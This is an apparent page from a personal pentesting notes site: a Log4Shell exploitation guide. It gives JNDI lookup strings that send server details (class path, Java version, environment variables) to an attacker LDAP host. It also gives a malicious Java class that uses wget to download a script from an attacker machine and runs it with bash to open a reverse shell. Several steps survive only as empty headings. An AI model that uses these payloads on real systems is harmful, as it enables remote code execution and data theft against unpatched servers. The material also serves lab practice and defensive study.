Intrusionz3r0-WriteupsHacktheboxGithubLinkedln

Log4Shell Exploitation Guide

Enumerate Log4Shell

Use Wireshark to catch the information (Follow > TCP Stream)

#Enumerate the server information
${jndi:ldap://10.10.14.6:1389/${sys:java.class.path}}
${jndi:ldap://10.10.14.6:1389/${java:version}}
${jndi:ldap://10.10.14.6:1389/${java:os}}
${jndi:ldap://10.10.14.6:1389/${env:myenv}}

Method #1 Manual Way

Install Dependencies

sudo apt install maven openjdk-17-jdk -y

Creating the Malicious Java Class

RCE.java

public class RCE {
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec("wget http://KALIIP/x -O /tmp/x");
            p.waitFor();
            r = Runtime.getRuntime();
            p = r.exec("/bin/bash /tmp/x");
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
    
    public RCE() {
        System.out.println("Is this RCE?");
    }
}

Compile the Payload

Setting Up the JNDI Exploit Server

Clone and Build marshalsec

Start the LDAP Server

Reverse Shell Payload

Create a file X with the following payload:

Exploiting Log4Shell

Send the malicious JNDI lookup string:

Notes

  • Replace KALIIP with your attacker's machine IP.

  • Ensure the target application is vulnerable to Log4Shell (e.g., using Log4j versions ≤ 2.14.1).

  • The payload downloads and executes a remote shell script to establish a reverse shell.

Example:

Got Reverse Shell

Method #2 ysoserial-modified

LogoGitHub - pimps/ysoserial-modified: That repository contains my updates to the well know java deserialization exploitation tool ysoserial.GitHub
LogoGitHub - pimps/JNDI-Exploit-Kit: JNDI-Exploitation-Kit(A modified version of the great JNDI-Injection-Exploit created by @welk1n. This tool can be used to start an HTTP Server, RMI Server and LDAP Server to exploit java web apps vulnerable to JNDI Injection)GitHub

PreviousWeb Mass Assignment VulnerabilitiesNextAuthentication

Last updated